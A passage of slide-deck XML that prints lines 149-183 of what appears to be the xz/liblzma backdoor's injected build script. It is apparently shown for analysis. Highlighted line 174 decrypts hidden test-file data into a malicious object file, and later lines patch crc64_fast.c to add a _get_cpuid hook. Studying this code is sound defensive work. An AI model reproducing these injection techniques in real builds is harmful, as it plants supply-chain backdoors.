            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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149: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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150: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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151: 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if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 ! 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grep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 -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qs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 "$x" $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top_srcdir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/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src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/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liblzma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/check/crc_x86_clmul.h; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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152: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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153: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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154: 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if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 ! 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grep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 -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qs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 "$C" ../../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libtool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; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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155: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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156: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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157: 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if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 ! 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echo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 $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liblzma_la_LINK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 | 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grep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 -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qs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 -e "-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z,now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" -e "-z -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Wl,now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" &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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158: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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159: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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160: 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if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echo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 $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liblzma_la_LINK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 | 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grep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 -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qs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 -e "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lazy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" &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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161: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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162: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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163: N=0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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164: W=0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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165: Y=`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grep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 "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dnl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Convert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it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 to C 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string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syntax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." $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top_srcdir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/m4/gettext.m4`</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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166: 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eval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 $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zrKcjv</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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167: 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if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 test -z "$Y"; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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168: N=0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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169: W=88792</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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170: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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171: N=88792</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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172: W=0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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173: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>174: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>top_srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/files/$p | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 'BEGIN{FS="\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>n";RS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>n";ORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="";m=256;for(i=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>m;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>++){t[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>x%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>",i)]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l&lt;4096;l++){i=(i+1)%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>m;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=c[i];j=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>j+a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>m;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[i]=c[j];c[j]=a;}}{v=t["x" (NF&lt;1?RS:$1)];i=(i+1)%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>m;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=c[i];j=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>j+a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>m;b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=c[j];c[i]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>b;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[j]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>a;k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=c[(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>a+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)%m];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> "%c",(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>v+k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)%m}' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -dc --single-stream | ((head -c +$N &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1) &amp;&amp; head -c +$W) &gt; liblzma_la-crc64-fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p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175: 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if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 ! test -f liblzma_la-crc64-fast.o; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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176: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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177: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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178: 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cp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 .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libs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/liblzma_la-crc64_fast.o .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libs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/liblzma_la-crc64-fast.o || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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179: V='#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endif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\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n#if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defined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(CRC32_GENERIC) &amp;&amp; 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defined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(CRC64_GENERIC) &amp;&amp; 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defined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(CRC_X86_CLMUL) &amp;&amp; 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defined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(CRC_USE_IFUNC) &amp;&amp; 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defined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(PIC) &amp;&amp; (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defined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(BUILDING_CRC64_CLMUL) || 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defined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(BUILDING_CRC32_CLMUL))\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nextern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int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 _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get_cpuid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(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int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, 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void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*, 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void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*, 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void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*, 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void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*, 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void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*);\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nstatic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inline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bool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 _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is_arch_extension_supported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(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void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) { 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int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 success = 1; uint32_t r[4]; success = _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get_cpuid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(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((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char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*) __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builtin_frame_address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(0))-16); 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const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 uint32_t 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ecx_mask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 = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19); 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return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 success &amp;&amp; (r[2] &amp; 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ecx_mask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) == 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ecx_mask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; }\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n#else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\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n#define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 _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is_arch_extension_supported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is_arch_extension_supported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'</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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180: 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eval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 $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yosA</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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181: 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if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 sed "/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return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is_arch_extension_supported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()/ c\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return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 _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is_arch_extension_supported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()" $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top_srcdir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/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src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/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liblzma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/check/crc64_fast.c | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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182: sed "/include \"crc_x86_clmul.h\"/a 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\\$V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" | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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183: sed "1i # 0 \"$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top_srcdir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/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src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/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liblzma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/check/crc64_fast.c\"" 2&gt;/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dev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/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null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 | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
